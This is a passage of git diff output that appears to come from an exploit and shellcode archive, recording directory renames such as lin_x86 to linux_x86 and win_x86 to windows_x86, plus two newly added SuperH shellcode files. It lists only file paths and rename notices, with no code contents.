linux_x86}/13338.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13339.asm (100%) rename shellcodes/{lin_x86 => linux_x86}/13340.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13341.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13342.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13343.asm (100%) rename shellcodes/{lin_x86 => linux_x86}/13344.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13345.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13346.s (100%) rename shellcodes/{lin_x86 => linux_x86}/13347.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13348.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13349.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13350.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13351.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13352.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13353.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13354.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13355.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13356.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13357.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13358.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13359.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13360.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13361.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13362.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13363.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13365.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13366.txt (100%) rename shellcodes/{lin_x86 => linux_x86}/13367.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13368.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13369.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13370.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13371.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13372.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13373.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13374.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13375.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13376.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13377.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13378.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13379.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13380.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13381.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13382.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13383.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13384.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13385.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13386.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13387.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13388.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13389.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13390.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13391.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13392.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13393.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13394.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13395.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13396.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13397.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13398.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13399.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13400.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13402.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13403.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13404.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13405.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13406.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13407.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13408.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13409.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13410.s (100%) rename shellcodes/{lin_x86 => linux_x86}/13411.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13412.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13413.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13414.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13415.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13416.txt (100%) rename shellcodes/{lin_x86 => linux_x86}/13417.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13418.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13419.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13420.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13421.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13422.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13423.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13424.txt (100%) rename shellcodes/{lin_x86 => linux_x86}/13425.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13426.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13427.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13428.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13429.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13430.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13431.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13432.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13433.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13434.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13435.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13436.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13437.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13438.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13439.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13440.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13441.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13442.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13443.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13444.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13445.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13446.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13447.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13448.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13449.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13450.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13451.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13452.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13453.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13454.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13455.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13456.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13457.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13458.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13460.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13461.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13462.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13548.asm (100%) rename shellcodes/{lin_x86 => linux_x86}/13549.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13550.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13551.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13553.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13563.asm (100%) rename shellcodes/{lin_x86 => linux_x86}/13566.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13572.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13576.asm (100%) rename shellcodes/{lin_x86 => linux_x86}/13577.txt (100%) rename shellcodes/{lin_x86 => linux_x86}/13578.txt (100%) rename shellcodes/{lin_x86 => linux_x86}/13579.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13586.txt (100%) rename shellcodes/{lin_x86 => linux_x86}/13599.txt (100%) rename shellcodes/{lin_x86 => linux_x86}/13600.txt (100%) rename shellcodes/{lin_x86 => linux_x86}/13601.txt (100%) rename shellcodes/{lin_x86 => linux_x86}/13602.txt (100%) rename shellcodes/{lin_x86 => linux_x86}/13609.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13627.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13628.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13632.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13661.txt (100%) rename shellcodes/{lin_x86 => linux_x86}/13669.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13671.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13673.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13675.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13676.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13677.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13680.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13681.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13682.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13692.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13697.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13698.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13702.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13703.txt (100%) rename shellcodes/{lin_x86 => linux_x86}/13712.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13715.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13716.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13722.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13723.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13724.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13725.txt (100%) rename shellcodes/{lin_x86 => linux_x86}/13726.txt (100%) rename shellcodes/{lin_x86 => linux_x86}/13728.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13730.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13731.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13732.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13742.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13743.c (100%) rename shellcodes/{lin_x86 => linux_x86}/13910.c (100%) rename shellcodes/{lin_x86 => linux_x86}/14119.c (100%) rename shellcodes/{lin_x86 => linux_x86}/14216.c (100%) rename shellcodes/{lin_x86 => linux_x86}/14332.c (100%) rename shellcodes/{lin_x86 => linux_x86}/14334.c (100%) rename shellcodes/{lin_x86 => linux_x86}/14691.c (100%) rename shellcodes/{lin_x86 => linux_x86}/17194.txt (100%) rename shellcodes/{lin_x86 => linux_x86}/17371.txt (100%) rename shellcodes/{lin_x86 => linux_x86}/17559.c (100%) rename shellcodes/{lin_x86 => linux_x86}/18294.c (100%) rename shellcodes/{lin_x86 => linux_x86}/18379.c (100%) rename shellcodes/{lin_x86 => linux_x86}/18885.c (100%) rename shellcodes/{lin_x86 => linux_x86}/20195.c (100%) rename shellcodes/{lin_x86 => linux_x86}/20196.c (100%) rename shellcodes/{lin_x86 => linux_x86}/23622.c (100%) rename shellcodes/{lin_x86 => linux_x86}/25497.c (100%) rename shellcodes/{lin_x86 => linux_x86}/28474.c (100%) rename shellcodes/{lin_x86 => linux_x86}/34060.c (100%) rename shellcodes/{lin_x86 => linux_x86}/34262.c (100%) rename shellcodes/{lin_x86 => linux_x86}/34592.c (100%) rename shellcodes/{lin_x86 => linux_x86}/34778.c (100%) rename shellcodes/{lin_x86 => linux_x86}/35519.txt (100%) rename shellcodes/{lin_x86 => linux_x86}/36391.c (100%) rename shellcodes/{lin_x86 => linux_x86}/36393.c (100%) rename shellcodes/{lin_x86 => linux_x86}/36394.c (100%) rename shellcodes/{lin_x86 => linux_x86}/36395.c (100%) rename shellcodes/{lin_x86 => linux_x86}/36397.c (100%) rename shellcodes/{lin_x86 => linux_x86}/36398.c (100%) rename shellcodes/{lin_x86 => linux_x86}/36637.c (100%) rename shellcodes/{lin_x86 => linux_x86}/36672.asm (100%) rename shellcodes/{lin_x86 => linux_x86}/36701.c (100%) rename shellcodes/{lin_x86 => linux_x86}/36750.c (100%) rename shellcodes/{lin_x86 => linux_x86}/36778.c (100%) rename shellcodes/{lin_x86 => linux_x86}/36857.c (100%) rename shellcodes/{lin_x86 => linux_x86}/36908.c (100%) rename shellcodes/{lin_x86 => linux_x86}/36921.c (100%) rename shellcodes/{lin_x86 => linux_x86}/37069.c (100%) rename shellcodes/{lin_x86 => linux_x86}/37251.asm (100%) rename shellcodes/{lin_x86 => linux_x86}/37285.txt (100%) rename shellcodes/{lin_x86 => linux_x86}/37289.txt (100%) rename shellcodes/{lin_x86 => linux_x86}/37297.txt (100%) rename shellcodes/{lin_x86 => linux_x86}/37358.c (100%) rename shellcodes/{lin_x86 => linux_x86}/37359.c (100%) rename shellcodes/{lin_x86 => linux_x86}/37365.c (100%) rename shellcodes/{lin_x86 => linux_x86}/37366.c (100%) rename shellcodes/{lin_x86 => linux_x86}/37384.c (100%) rename shellcodes/{lin_x86 => linux_x86}/37390.asm (100%) rename shellcodes/{lin_x86 => linux_x86}/37391.asm (100%) rename shellcodes/{lin_x86 => linux_x86}/37392.asm (100%) rename shellcodes/{lin_x86 => linux_x86}/37393.asm (100%) rename shellcodes/{lin_x86 => linux_x86}/37495.py (100%) rename shellcodes/{lin_x86 => linux_x86}/37749.c (100%) rename shellcodes/{lin_x86 => linux_x86}/37762.py (100%) rename shellcodes/{lin_x86 => linux_x86}/38088.c (100%) rename shellcodes/{lin_x86 => linux_x86}/38116.c (100%) rename shellcodes/{lin_x86 => linux_x86}/39160.c (100%) rename shellcodes/{lin_x86 => linux_x86}/39204.c (100%) rename shellcodes/{lin_x86 => linux_x86}/39389.c (100%) rename shellcodes/{lin_x86 => linux_x86}/39722.c (100%) rename shellcodes/{lin_x86 => linux_x86}/39723.c (100%) rename shellcodes/{lin_x86 => linux_x86}/39851.c (100%) rename shellcodes/{lin_x86 => linux_x86}/39901.c (100%) rename shellcodes/{lin_x86 => linux_x86}/40026.txt (100%) rename shellcodes/{lin_x86 => linux_x86}/40056.c (100%) rename shellcodes/{lin_x86 => linux_x86}/40075.c (100%) rename shellcodes/{lin_x86 => linux_x86}/40110.c (100%) rename shellcodes/{lin_x86 => linux_x86}/40131.c (100%) rename shellcodes/{lin_x86 => linux_x86}/40179.c (100%) rename shellcodes/{lin_x86 => linux_x86}/40222.c (100%) rename shellcodes/{lin_x86 => linux_x86}/40223.c (100%) rename shellcodes/{lin_x86 => linux_x86}/40827.c (100%) rename shellcodes/{lin_x86 => linux_x86}/40872.c (100%) rename shellcodes/{lin_x86 => linux_x86}/40924.c (100%) rename shellcodes/{lin_x86 => linux_x86}/41282.nasm (100%) rename shellcodes/{lin_x86 => linux_x86}/41403.c (100%) rename shellcodes/{lin_x86 => linux_x86}/41630.asm (100%) rename shellcodes/{lin_x86 => linux_x86}/41631.c (100%) rename shellcodes/{lin_x86 => linux_x86}/41635.txt (100%) rename shellcodes/{lin_x86 => linux_x86}/41723.c (100%) rename shellcodes/{lin_x86 => linux_x86}/41757.txt (100%) rename shellcodes/{lin_x86 => linux_x86}/41909.c (100%) rename shellcodes/{lin_x86 => linux_x86}/41969.c (100%) rename shellcodes/{lin_x86 => linux_x86}/42177.c (100%) rename shellcodes/{lin_x86 => linux_x86}/42208.nasm (100%) rename shellcodes/{lin_x86 => linux_x86}/42254.c (100%) rename shellcodes/{lin_x86 => linux_x86}/42295.c (100%) rename shellcodes/{lin_x86 => linux_x86}/42428.c (100%) rename shellcodes/{lin_x86 => linux_x86}/42594.c (100%) rename shellcodes/{lin_x86 => linux_x86}/42977.c (100%) rename shellcodes/{lin_x86 => linux_x86}/43433.c (100%) rename shellcodes/{lin_x86 => linux_x86}/43476.c (100%) rename shellcodes/{lin_x86 => linux_x86}/43489.c (100%) rename shellcodes/{sh4 => superh_sh4}/17432.c (100%) rename shellcodes/{sh4 => superh_sh4}/17439.c (100%) rename shellcodes/{sh4 => superh_sh4}/18154.c (100%) create mode 100644 shellcodes/superh_sh4/43541.c create mode 100644 shellcodes/superh_sh4/43542.c rename shellcodes/{win_x86-64 => windows_x86-64}/13533.asm (100%) rename shellcodes/{win_x86-64 => windows_x86-64}/13719.txt (100%) rename shellcodes/{win_x86-64 => windows_x86-64}/13729.txt (100%) rename shellcodes/{win_x86-64 => windows_x86-64}/35794.txt (100%) rename shellcodes/{win_x86-64 => windows_x86-64}/37895.asm (100%) rename shellcodes/{win_x86-64 => windows_x86-64}/40549.c (100%) rename shellcodes/{win_x86-64 => windows_x86-64}/40781.c (100%) rename shellcodes/{win_x86-64 => windows_x86-64}/40821.c (100%) rename shellcodes/{win_x86-64 => windows_x86-64}/40890.c (100%) rename shellcodes/{win_x86-64 => windows_x86-64}/40981.c (100%) rename shellcodes/{win_x86-64 => windows_x86-64}/41072.c (100%) rename shellcodes/{win_x86-64 => windows_x86-64}/41827.txt (100%) rename shellcodes/{win_x86-64 => windows_x86-64}/42992.c (100%) rename shellcodes/{win_x86 => windows_x86}/13504.asm (100%) rename shellcodes/{win_x86 => windows_x86}/13505.c (100%) rename shellcodes/{win_x86 => windows_x86}/13507.txt (100%) rename shellcodes/{win_x86 => windows_x86}/13508.asm (100%) rename shellcodes/{win_x86 => windows_x86}/13509.c (100%) rename shellcodes/{win_x86 => windows_x86}/13510.c (100%) rename shellcodes/{win_x86 => windows_x86}/13511.c (100%) rename shellcodes/{win_x86 => windows_x86}/13512.c (100%) rename shellcodes/{win_x86 => windows_x86}/13513.c (100%) rename shellcodes/{win_x86 => windows_x86}/13514.asm (100%) rename shellcodes/{win_x86 => windows_x86}/13516.asm (100%) rename shellcodes/{win_x86 => windows_x86}/13517.asm (100%) rename shellcodes/{win_x86 => windows_x86}/13518.c (100%) rename shellcodes/{win_x86 => windows_x86}/13519.c (100%) rename shellcodes/{win_x86 => windows_x86}/13520.c (100%) rename shellcodes/{win_x86 => windows_x86}/13521.asm (100%) rename shellcodes/{win_x86 => windows_x86}/13522.c (100%) rename shellcodes/{win_x86 => windows_x86}/13523.c (100%) rename shellcodes/{win_x86 => windows_x86}/13524.txt (100%) rename shellcodes/{win_x86 => windows_x86}/13525.c (100%) rename shellcodes/{win_x86 => windows_x86}/13526.c (100%) rename shellcodes/{win_x86 => windows_x86}/13527.c (100%) rename shellcodes/{win_x86 => windows_x86}/13529.c (100%) rename shellcodes/{win_x86 => windows_x86}/13530.asm (100%) rename shellcodes/{win_x86 => windows_x86}/13531.c (100%) rename shellcodes/{win_x86 => windows_x86}/13532.asm (100%) rename shellcodes/{win_x86 => windows_x86}/13565.asm (100%) rename shellcodes/{win_x86 => windows_x86}/13569.asm (100%) rename shellcodes/{win_x86 => windows_x86}/13571.c (100%) rename shellcodes/{win_x86 => windows_x86}/13574.c (100%) rename shellcodes/{win_x86 => windows_x86}/13595.c (100%) rename shellcodes/{win_x86 => windows_x86}/13614.c (100%) rename shellcodes/{win_x86 => windows_x86}/13615.c (100%) rename shellcodes/{win_x86 => windows_x86}/13630.c (100%) rename shellcodes/{win_x86 => windows_x86}/13631.c (100%) rename shellcodes/{win_x86 => windows_x86}/13635.txt (100%) rename shellcodes/{win_x86 => windows_x86}/13636.c (100%) rename shellcodes/{win_x86 => windows_x86}/13639.c (100%) rename shellcodes/{win_x86 => windows_x86}/13642.txt (100%) rename shellcodes/{win_x86 => windows_x86}/13647.txt (100%) rename shellcodes/{win_x86 => windows_x86}/13648.rb (100%) rename shellcodes/{win_x86 => windows_x86}/13699.txt (100%) rename shellcodes/{win_x86 => windows_x86}/14014.pl (100%) rename shellcodes/{win_x86 => windows_x86}/14288.asm (100%) rename shellcodes/{win_x86 => windows_x86}/14873.asm (100%) rename shellcodes/{win_x86 => windows_x86}/15063.c (100%) rename shellcodes/{win_x86 => windows_x86}/15202.c (100%) rename shellcodes/{win_x86 => windows_x86}/15203.c (100%) rename shellcodes/{win_x86 => windows_x86}/15879.txt (100%) rename shellcodes/{win_x86 => windows_x86}/16283.txt (100%) rename shellcodes/{win_x86 => windows_x86}/17545.txt (100%) rename shellcodes/{win_x86 => windows_x86}/35793.txt (100%) rename shellcodes/{win_x86 => windows_x86}/36779.c (100%) rename shellcodes/{win_x86 => windows_x86}/36780.c (100%) rename shellcodes/{win_x86 => windows_x86}/37664.c (100%) rename shellcodes/{win_x86 => windows_x86}/37758.c (100%) rename shellcodes/{win_x86 => windows_x86}/39519.c (100%) rename shellcodes/{win_x86 => windows_x86}/39754.txt (100%) rename shellcodes/{win_x86 => windows_x86}/39900.c (100%) rename shellcodes/{win_x86 => windows_x86}/39914.c (100%) rename shellcodes/{win_x86 => windows_x86}/40005.c (100%) rename shellcodes/{win_x86 => windows_x86}/40094.c (100%) rename shellcodes/{win_x86 => windows_x86}/40175.c (100%) rename shellcodes/{win_x86 => windows_x86}/40245.c (100%) rename shellcodes/{win_x86 => windows_x86}/40246.c (100%) rename shellcodes/{win_x86 => windows_x86}/40259.c (100%) rename shellcodes/{win_x86 => windows_x86}/40334.c (100%) rename shellcodes/{win_x86 => windows_x86}/40352.c (100%) rename shellcodes/{win_x86 => windows_x86}/40363.c (100%) rename shellcodes/{win_x86 => windows_x86}/40560.asm (100%) rename shellcodes/{win_x86 => windows_x86}/41381.c (100%) rename shellcodes/{win_x86 => windows_x86}/41467.c (100%) rename shellcodes/{win_x86 => windows_x86}/41481.asm (100%) rename shellcodes/{win_x86 => windows_x86}/41581.c (100%) diff --git a/exploits/lin_x86-64/dos/21224.c b/exploits/linux_x86-64/dos/21224.c similarity index 100% rename from exploits/lin_x86-64/dos/21224.c rename to exploits/linux_x86-64/dos/21224.c diff --git a/exploits/lin_x86-64/dos/33585.txt b/exploits/linux_x86-64/dos/33585.txt similarity index 100% rename from exploits/lin_x86-64/dos/33585.txt rename to exploits/linux_x86-64/dos/33585.txt diff --git a/exploits/lin_x86-64/dos/36266.c b/exploits/linux_x86-64/dos/36266.c similarity index 100% rename from exploits/lin_x86-64/dos/36266.c rename to exploits/linux_x86-64/dos/36266.c diff --git a/exploits/lin_x86-64/dos/37868.txt b/exploits/linux_x86-64/dos/37868.txt similarity index 100% rename from exploits/lin_x86-64/dos/37868.txt rename to exploits/linux_x86-64/dos/37868.txt diff --git a/exploits/lin_x86-64/dos/37876.txt b/exploits/linux_x86-64/dos/37876.txt similarity index 100% rename from exploits/lin_x86-64/dos/37876.txt rename to exploits/linux_x86-64/dos/37876.txt diff --git a/exploits/lin_x86-64/dos/37879.txt b/exploits/linux_x86-64/dos/37879.txt similarity index 100% rename from exploits/lin_x86-64/dos/37879.txt rename to exploits/linux_x86-64/dos/37879.txt diff --git a/exploits/lin_x86-64/dos/37880.txt b/exploits/linux_x86-64/dos/37880.txt similarity index 100% rename from exploits/lin_x86-64/dos/37880.txt rename to exploits/linux_x86-64/dos/37880.txt diff --git a/exploits/lin_x86-64/local/15023.c b/exploits/linux_x86-64/local/15023.c similarity index 100% rename from exploits/lin_x86-64/local/15023.c rename to exploits/linux_x86-64/local/15023.c diff --git a/exploits/lin_x86-64/local/15024.c b/exploits/linux_x86-64/local/15024.c similarity index 100% rename from exploits/lin_x86-64/local/15024.c rename to exploits/linux_x86-64/local/15024.c diff --git a/exploits/lin_x86-64/local/24555.c b/exploits/linux_x86-64/local/24555.c similarity index 100% rename from exploits/lin_x86-64/local/24555.c rename to exploits/linux_x86-64/local/24555.c diff --git a/exploits/lin_x86-64/local/24746.c b/exploits/linux_x86-64/local/24746.c similarity index 100% rename from exploits/lin_x86-64/local/24746.c rename to exploits/linux_x86-64/local/24746.c diff --git a/exploits/lin_x86-64/local/26131.c b/exploits/linux_x86-64/local/26131.c similarity index 100% rename from exploits/lin_x86-64/local/26131.c rename to exploits/linux_x86-64/local/26131.c diff --git a/exploits/lin_x86-64/local/31347.c b/exploits/linux_x86-64/local/31347.c similarity index 100% rename from exploits/lin_x86-64/local/31347.c rename to exploits/linux_x86-64/local/31347.c diff --git a/exploits/lin_x86-64/local/32751.c b/exploits/linux_x86-64/local/32751.c similarity index 100% rename from exploits/lin_x86-64/local/32751.c rename to exploits/linux_x86-64/local/32751.c diff --git a/exploits/lin_x86-64/local/33516.c b/exploits/linux_x86-64/local/33516.c similarity index 100% rename from exploits/lin_x86-64/local/33516.c rename to exploits/linux_x86-64/local/33516.c diff --git a/exploits/lin_x86-64/local/33589.c b/exploits/linux_x86-64/local/33589.c similarity index 100% rename from exploits/lin_x86-64/local/33589.c rename to exploits/linux_x86-64/local/33589.c diff --git a/exploits/lin_x86-64/local/34134.c b/exploits/linux_x86-64/local/34134.c similarity index 100% rename from exploits/lin_x86-64/local/34134.c rename to exploits/linux_x86-64/local/34134.c diff --git a/exploits/lin_x86-64/local/35472.txt b/exploits/linux_x86-64/local/35472.txt similarity index 100% rename from exploits/lin_x86-64/local/35472.txt rename to exploits/linux_x86-64/local/35472.txt diff --git a/exploits/lin_x86-64/local/36310.txt b/exploits/linux_x86-64/local/36310.txt similarity index 100% rename from exploits/lin_x86-64/local/36310.txt rename to exploits/linux_x86-64/local/36310.txt diff --git a/exploits/lin_x86-64/local/36311.txt b/exploits/linux_x86-64/local/36311.txt similarity index 100% rename from exploits/lin_x86-64/local/36311.txt rename to exploits/linux_x86-64/local/36311.txt diff --git a/exploits/lin_x86-64/local/37722.c b/exploits/linux_x86-64/local/37722.c similarity index 100% rename from exploits/lin_x86-64/local/37722.c rename to exploits/linux_x86-64/local/37722.c diff --git a/exploits/lin_x86-64/local/40049.c b/exploits/linux_x86-64/local/40049.c similarity index 100% rename from exploits/lin_x86-64/local/40049.c rename to exploits/linux_x86-64/local/40049.c diff --git a/exploits/lin_x86-64/local/40811.c b/exploits/linux_x86-64/local/40811.c similarity index 100% rename from exploits/lin_x86-64/local/40811.c rename to exploits/linux_x86-64/local/40811.c diff --git a/exploits/lin_x86-64/local/40871.c b/exploits/linux_x86-64/local/40871.c similarity index 100% rename from exploits/lin_x86-64/local/40871.c rename to exploits/linux_x86-64/local/40871.c diff --git a/exploits/lin_x86-64/local/42275.c b/exploits/linux_x86-64/local/42275.c similarity index 100% rename from exploits/lin_x86-64/local/42275.c rename to exploits/linux_x86-64/local/42275.c diff --git a/exploits/lin_x86-64/local/4460.c b/exploits/linux_x86-64/local/4460.c similarity index 100% rename from exploits/lin_x86-64/local/4460.c rename to exploits/linux_x86-64/local/4460.c diff --git a/exploits/lin_x86-64/local/9083.c b/exploits/linux_x86-64/local/9083.c similarity index 100% rename from exploits/lin_x86-64/local/9083.c rename to exploits/linux_x86-64/local/9083.c diff --git a/exploits/lin_x86-64/remote/32277.txt b/exploits/linux_x86-64/remote/32277.txt similarity index 100% rename from exploits/lin_x86-64/remote/32277.txt rename to exploits/linux_x86-64/remote/32277.txt diff --git a/exploits/lin_x86-64/remote/42964.rb b/exploits/linux_x86-64/remote/42964.rb similarity index 100% rename from exploits/lin_x86-64/remote/42964.rb rename to exploits/linux_x86-64/remote/42964.rb diff --git a/exploits/lin_x86/dos/36741.py b/exploits/linux_x86/dos/36741.py similarity index 100% rename from exploits/lin_x86/dos/36741.py rename to exploits/linux_x86/dos/36741.py diff --git a/exploits/lin_x86/dos/38763.txt b/exploits/linux_x86/dos/38763.txt similarity index 100% rename from exploits/lin_x86/dos/38763.txt rename to exploits/linux_x86/dos/38763.txt diff --git a/exploits/lin_x86/dos/39669.txt b/exploits/linux_x86/dos/39669.txt similarity index 100% rename from exploits/lin_x86/dos/39669.txt rename to exploits/linux_x86/dos/39669.txt diff --git a/exploits/lin_x86/local/15916.c b/exploits/linux_x86/local/15916.c similarity index 100% rename from exploits/lin_x86/local/15916.c rename to exploits/linux_x86/local/15916.c diff --git a/exploits/lin_x86/local/26709.txt b/exploits/linux_x86/local/26709.txt similarity index 100% rename from exploits/lin_x86/local/26709.txt rename to exploits/linux_x86/local/26709.txt diff --git a/exploits/lin_x86/local/37724.asm b/exploits/linux_x86/local/37724.asm similarity index 100% rename from exploits/lin_x86/local/37724.asm rename to exploits/linux_x86/local/37724.asm diff --git a/exploits/lin_x86/local/40435.rb b/exploits/linux_x86/local/40435.rb similarity index 100% rename from exploits/lin_x86/local/40435.rb rename to exploits/linux_x86/local/40435.rb diff --git a/exploits/lin_x86/local/42273.c b/exploits/linux_x86/local/42273.c similarity index 100% rename from exploits/lin_x86/local/42273.c rename to exploits/linux_x86/local/42273.c diff --git a/exploits/lin_x86/local/42274.c b/exploits/linux_x86/local/42274.c similarity index 100% rename from exploits/lin_x86/local/42274.c rename to exploits/linux_x86/local/42274.c diff --git a/exploits/lin_x86/local/42276.c b/exploits/linux_x86/local/42276.c similarity index 100% rename from exploits/lin_x86/local/42276.c rename to exploits/linux_x86/local/42276.c diff --git a/exploits/lin_x86/local/9542.c b/exploits/linux_x86/local/9542.c similarity index 100% rename from exploits/lin_x86/local/9542.c rename to exploits/linux_x86/local/9542.c diff --git a/exploits/lin_x86/remote/1291.pl b/exploits/linux_x86/remote/1291.pl similarity index 100% rename from exploits/lin_x86/remote/1291.pl rename to exploits/linux_x86/remote/1291.pl diff --git a/exploits/lin_x86/remote/16860.rb b/exploits/linux_x86/remote/16860.rb similarity index 100% rename from exploits/lin_x86/remote/16860.rb rename to exploits/linux_x86/remote/16860.rb diff --git a/exploits/lin_x86/remote/16861.rb 